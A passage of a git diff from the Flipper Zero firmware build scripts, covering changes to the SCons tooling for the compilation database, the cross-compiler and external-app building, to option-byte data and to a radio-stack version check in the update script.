os.listdir(dir_path) # ) self.directory_list.append( - { - "path": os.path.relpath(dir_path, self.directory_path), - } + {"path": os.path.relpath(dir_path, directory_path)} ) self.file_list.sort(key=lambda f: f["path"]) self.directory_list.sort(key=lambda d: d["path"]) + def _process_src_dirs(self): + self.file_list: list[File] = [] + self.directory_list: list[Dir] = [] + for directory_path in self.src_dirs: + self._gather(directory_path) + def export(self, target_path: str): + self._process_src_dirs() self._md5_hash = hashlib.md5() with open(target_path, "wb") as f: # Write header magic and version diff --git a/scripts/fbt_tools/compilation_db.py b/scripts/fbt_tools/compilation_db.py index 1f829ddb4..3d5e469f4 100644 --- a/scripts/fbt_tools/compilation_db.py +++ b/scripts/fbt_tools/compilation_db.py @@ -29,22 +29,26 @@ which is the name that most clang tools search for by default. # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # -import json -import itertools import fnmatch +import itertools +import json +from shlex import quote + import SCons - -from SCons.Tool.cxx import CXXSuffixes +from SCons.Tool.asm import ASPPSuffixes, ASSuffixes from SCons.Tool.cc import CSuffixes -from SCons.Tool.asm import ASSuffixes, ASPPSuffixes +from SCons.Tool.cxx import CXXSuffixes -# TODO FL-3542: Is there a better way to do this than this global? Right now this exists so that the +# TODO: (-nofl) Is there a better way to do this than this global? Right now this exists so that the # emitter we add can record all of the things it emits, so that the scanner for the top level # compilation database can access the complete list, and also so that the writer has easy # access to write all of the files. But it seems clunky. How can the emitter and the scanner # communicate more gracefully? __COMPILATION_DB_ENTRIES = [] +# We cache the tool path lookups to avoid doing them over and over again. +_TOOL_PATH_CACHE = {} + # We make no effort to avoid rebuilding the entries. Someday, perhaps we could and even # integrate with the cache, but there doesn't seem to be much call for it. @@ -91,7 +95,7 @@ def make_emit_compilation_DB_entry(comstr): __COMPILATIONDB_ENV=env, ) - # TODO FL-3541: Technically, these next two lines should not be required: it should be fine to + # TODO: (-nofl) Technically, these next two lines should not be required: it should be fine to # cache the entries. However, they don't seem to update properly. Since they are quick # to re-generate disable caching and sidestep this problem. env.AlwaysBuild(entry) @@ -122,6 +126,17 @@ def compilation_db_entry_action(target, source, env, **kw): env=env["__COMPILATIONDB_ENV"], ) + # We assume first non-space character is the executable + executable = command.split(" ", 1)[0] + if not (tool_path := _TOOL_PATH_CACHE.get(executable, None)): + tool_path = env.WhereIs(executable) or executable + _TOOL_PATH_CACHE[executable] = tool_path + # If there are spaces in the executable path, we need to quote it + if " " in tool_path: + tool_path = quote(tool_path) + # Replacing the executable with the full path + command = tool_path + command[len(executable) :] + entry = { "directory": env.Dir("#").abspath, "command": command, @@ -242,10 +257,7 @@ def generate(env, **kwargs): for entry in components_by_suffix: suffix = entry[0] builder, base_emitter, command = entry[1] - - # Assumes a dictionary emitter - emitter = builder.emitter.get(suffix, False) - if emitter: + if emitter := builder.emitter.get(suffix, False): # We may not have tools installed which initialize all or any of # cxx, cc, or assembly. If not skip resetting the respective emitter. builder.emitter[suffix] = SCons.Builder.ListEmitter( diff --git a/scripts/fbt_tools/crosscc.py b/scripts/fbt_tools/crosscc.py index 42fb4ce4b..4890424e6 100644 --- a/scripts/fbt_tools/crosscc.py +++ b/scripts/fbt_tools/crosscc.py @@ -2,8 +2,6 @@ import subprocess import gdb import objdump -import shutil - import strip from SCons.Action import _subproc from SCons.Errors import StopError @@ -13,20 +11,25 @@ from SCons.Tool import ar, asm, gcc, gnulink, gxx def prefix_commands(env, command_prefix, cmd_list): for command in cmd_list: if command in env: - env[command] = shutil.which(command_prefix + env[command]) + prefixed_binary = command_prefix + env[command] + if not env.WhereIs(prefixed_binary): + raise StopError( + f"Toolchain binary {prefixed_binary} not found in PATH." + ) + env.Replace(**{command: prefixed_binary}) def _get_tool_version(env, tool): verstr = "version unknown" proc = _subproc( env, - env.subst("${%s} --version" % tool), + [env.subst("${%s}" % tool), "--version"], stdout=subprocess.PIPE, stderr="devnull", stdin="devnull", universal_newlines=True, error="raise", - shell=True, + shell=False, ) if proc: verstr = proc.stdout.readline() diff --git a/scripts/fbt_tools/fbt_extapps.py b/scripts/fbt_tools/fbt_extapps.py index 6059628f0..aa6354c9e 100644 --- a/scripts/fbt_tools/fbt_extapps.py +++ b/scripts/fbt_tools/fbt_extapps.py @@ -3,7 +3,7 @@ import os import pathlib import shutil from dataclasses import dataclass, field -from typing import Optional, Dict, List +from typing import Dict, List, Optional import SCons.Warnings from ansi.color import fg @@ -32,11 +32,15 @@ class FlipperExternalAppInfo: class AppBuilder: + @staticmethod + def get_app_work_dir(env, app): + return env["EXT_APPS_WORK_DIR"].Dir(app.appid) + def __init__(self, env, app): self.fw_env = env self.app = app - self.ext_apps_work_dir = env.subst("$EXT_APPS_WORK_DIR") - self.app_work_dir = os.path.join(self.ext_apps_work_dir, self.app.appid) + self.ext_apps_work_dir = env["EXT_APPS_WORK_DIR"] + self.app_work_dir = self.get_app_work_dir(env, app) self.app_alias = f"fap_{self.app.appid}" self.externally_built_files = [] self.private_libs = [] @@ -83,9 +87,9 @@ class AppBuilder: return fap_icons = self.app_env.CompileIcons( - self.app_env.Dir(self.app_work_dir), + self.app_work_dir, self.app._appdir.Dir(self.app.fap_icon_assets), - icon_bundle_name=f"{self.app.fap_icon_assets_symbol if self.app.fap_icon_assets_symbol else self.app.appid }_icons", + icon_bundle_name=f"{self.app.fap_icon_assets_symbol or self.app.appid }_icons", ) self.app_env.Alias("_fap_icons", fap_icons) self.fw_env.Append(_APP_ICONS=[fap_icons]) @@ -95,7 +99,7 @@ class AppBuilder: self.private_libs.append(self._build_private_lib(lib_def)) def _build_private_lib(self, lib_def): - lib_src_root_path = os.path.join(self.app_work_dir, "lib", lib_def.name) + lib_src_root_path = self.app_work_dir.Dir("lib").Dir(lib_def.name) self.app_env.AppendUnique( CPPPATH=list( self.app_env.Dir(lib_src_root_path) @@ -119,9 +123,7 @@ class AppBuilder: private_lib_env = self.app_env.Clone() private_lib_env.AppendUnique( - CCFLAGS=[ - *lib_def.cflags, - ], + CCFLAGS=lib_def.cflags, CPPDEFINES=lib_def.cdefines, CPPPATH=list( map( @@ -132,14 +134,17 @@ class AppBuilder: ) return private_lib_env.StaticLibrary( - os.path.join(self.app_work_dir, lib_def.name), + self.app_work_dir.File(lib_def.name), lib_sources, ) def _build_app(self): + if self.app.fap_file_assets: + self.app._assets_dirs = [self.app._appdir.Dir(self.app.fap_file_assets)] + self.app_env.Append( LIBS=[*self.app.fap_libs, *self.private_libs], - CPPPATH=[self.app_env.Dir(self.app_work_dir), self.app._appdir], + CPPPATH=[self.app_work_dir, self.app._appdir], ) app_sources = list( @@ -155,32 +160,46 @@ class AppBuilder: app_artifacts = FlipperExternalAppInfo(self.app) app_artifacts.debug = self.app_env.Program( - os.path.join(self.ext_apps_work_dir, f"{self.app.appid}_d"), + self.ext_apps_work_dir.File(f"{self.app.appid}_d.elf"), app_sources, APP_ENTRY=self.app.entry_point, )[0] app_artifacts.compact = self.app_env.EmbedAppMetadata( - os.path.join(self.ext_apps_work_dir, self.app.appid), + self.ext_apps_work_dir.File(f"{self.app.appid}.fap"), app_artifacts.debug, APP=self.app, )[0] + if self.app.embeds_plugins: + self.app._assets_dirs.append(self.app_work_dir.Dir("assets")) + app_artifacts.validator = self.app_env.ValidateAppImports( app_artifacts.compact )[0] if self.app.apptype == FlipperAppType.PLUGIN: for parent_app_id in self.app.requires: - fal_path = ( - f"apps_data/{parent_app_id}/plugins/{app_artifacts.compact.name}" - ) - deployable = True - # If it's a plugin for a non-deployable app, don't include it in the resources - if parent_app := self.app._appmanager.get(parent_app_id): - if not parent_app.is_default_deployable: - deployable = False - app_artifacts.dist_entries.append((deployable, fal_path)) + if self.app.fal_embedded: + parent_app = self.app._appmanager.get(parent_app_id) + if not parent_app: + raise UserError( + f"Embedded plugin {self.app.appid} requires unknown app {parent_app_id}" + ) + self.app_env.Install( + target=self.get_app_work_dir(self.app_env, parent_app) + .Dir("assets") + .Dir("plugins"), + source=app_artifacts.compact, + ) + else: + fal_path = f"apps_data/{parent_app_id}/plugins/{app_artifacts.compact.name}" + deployable = True + # If it's a plugin for a non-deployable app, don't include it in the resources + if parent_app := self.app._appmanager.get(parent_app_id): + if not parent_app.is_default_deployable: + deployable = False + app_artifacts.dist_entries.append((deployable, fal_path)) else: fap_path = f"apps/{self.app.fap_category}/{app_artifacts.compact.name}" app_artifacts.dist_entries.append( @@ -194,7 +213,7 @@ class AppBuilder: # Extra things to clean up along with the app self.app_env.Clean( app_artifacts.debug, - [*self.externally_built_files, self.app_env.Dir(self.app_work_dir)], + [*self.externally_built_files, self.app_work_dir], ) # Create listing of the app @@ -219,13 +238,10 @@ class AppBuilder: ) # Add dependencies on file assets - if self.app.fap_file_assets: + for assets_dir in self.app._assets_dirs: self.app_env.Depends( app_artifacts.compact, - self.app_env.GlobRecursive( - "*", - self.app._appdir.Dir(self.app.fap_file_assets), - ), + (assets_dir, self.app_env.GlobRecursive("*", assets_dir)), ) # Always run the validator for the app's binary when building the app @@ -344,25 +360,26 @@ def embed_app_metadata_emitter(target, source, env): if app.apptype == FlipperAppType.PLUGIN: target[0].name = target[0].name.replace(".fap", ".fal") - target.append(env.File(source[0].abspath + _FAP_META_SECTION)) + app_work_dir = AppBuilder.get_app_work_dir(env, app) + app._section_fapmeta = app_work_dir.File(_FAP_META_SECTION) + target.append(app._section_fapmeta) - if app.fap_file_assets: - target.append(env.File(source[0].abspath + _FAP_FILEASSETS_SECTION)) + # At this point, we haven't added dir with embedded plugins to _assets_dirs yet + if app._assets_dirs or app.embeds_plugins: + app._section_fapfileassets = app_work_dir.File(_FAP_FILEASSETS_SECTION) + target.append(app._section_fapfileassets) return (target, source) -def prepare_app_files(target, source, env): +def prepare_app_file_assets(target, source, env): files_section_node = next( filter(lambda t: t.name.endswith(_FAP_FILEASSETS_SECTION), target) ) - app = env["APP"] - directory = env.Dir(app._apppath).Dir(app.fap_file_assets) - if not directory.exists(): - raise UserError(f"File asset directory {directory} does not exist") - - bundler = FileBundler(directory.abspath) + bundler = FileBundler( + list(env.Dir(asset_dir).abspath for asset_dir in env["APP"]._assets_dirs) + ) bundler.export(files_section_node.abspath) @@ -376,12 +393,14 @@ def generate_embed_app_metadata_actions(source, target, env, for_signature): objcopy_str = ( "${OBJCOPY} " "--remove-section .ARM.attributes " - "--add-section ${_FAP_META_SECTION}=${SOURCE}${_FAP_META_SECTION} " + "--add-section ${_FAP_META_SECTION}=${APP._section_fapmeta} " ) - if app.fap_file_assets: - actions.append(Action(prepare_app_files, "$APPFILE_COMSTR")) - objcopy_str += "--add-section ${_FAP_FILEASSETS_SECTION}=${SOURCE}${_FAP_FILEASSETS_SECTION} " + if app._section_fapfileassets: + actions.append(Action(prepare_app_file_assets, "$APPFILE_COMSTR")) + objcopy_str += ( + "--add-section ${_FAP_FILEASSETS_SECTION}=${APP._section_fapfileassets} " + ) objcopy_str += ( "--set-section-flags ${_FAP_META_SECTION}=contents,noload,readonly,data " @@ -470,7 +489,7 @@ def AddAppBuildTarget(env, appname, build_target_name): def generate(env, **kw): env.SetDefault( - EXT_APPS_WORK_DIR="${FBT_FAP_DEBUG_ELF_ROOT}", + EXT_APPS_WORK_DIR=env.Dir(env["FBT_FAP_DEBUG_ELF_ROOT"]), APP_RUN_SCRIPT="${FBT_SCRIPT_DIR}/runfap.py", ) if not env["VERBOSE"]: diff --git a/scripts/ob.data b/scripts/ob.data index 605faccbf..9f6f1d081 100644 --- a/scripts/ob.data +++ b/scripts/ob.data @@ -14,15 +14,15 @@ IWDGSTOP:0x1:rw IWDGSW:0x1:rw IPCCDBA:0x0:rw ESE:0x1:r -SFSA:0xD5:r +SFSA:0xD7:r FSD:0x0:r DDS:0x1:r C2OPT:0x1:r NBRSD:0x0:r -SNBRSA:0xD:r +SNBRSA:0xB:r BRSD:0x0:r SBRSA:0x12:r -SBRV:0x35400:r +SBRV:0x35C00:r PCROP1A_STRT:0x1FF:r PCROP1A_END:0x0:r PCROP_RDP:0x1:rw diff --git a/scripts/update.py b/scripts/update.py index e6c69d35f..da4a93aee 100755 --- a/scripts/update.py +++ b/scripts/update.py @@ -74,6 +74,9 @@ class Main(App): self.parser_generate.add_argument( "--I-understand-what-I-am-doing", dest="disclaimer", required=False ) + self.parser_generate.add_argument( + "--stackversion", dest="stack_version", required=False, default="" + ) self.parser_generate.set_defaults(func=self.generate) @@ -94,6 +97,13 @@ class Main(App): if not self.args.radiotype: raise ValueError("Missing --radiotype") radio_meta = CoproBinary(self.args.radiobin) + if self.args.stack_version: + actual_stack_version_str = f"{radio_meta.img_sig.version_major}.{radio_meta.img_sig.version_minor}.{radio_meta.img_sig.version_sub}" + if actual_stack_version_str != self.args.stack_version: + self.logger.error( + f"Stack version mismatch: expected {self.args.stack_version}, actual {actual_stack_version_str}" + ) + return 1 radio_version = self.copro_version_as_int(radio_meta, self.args.radiotype) if ( get_stack_type(self.args.radiotype) not in self.WHITELISTED_STACK_TYPES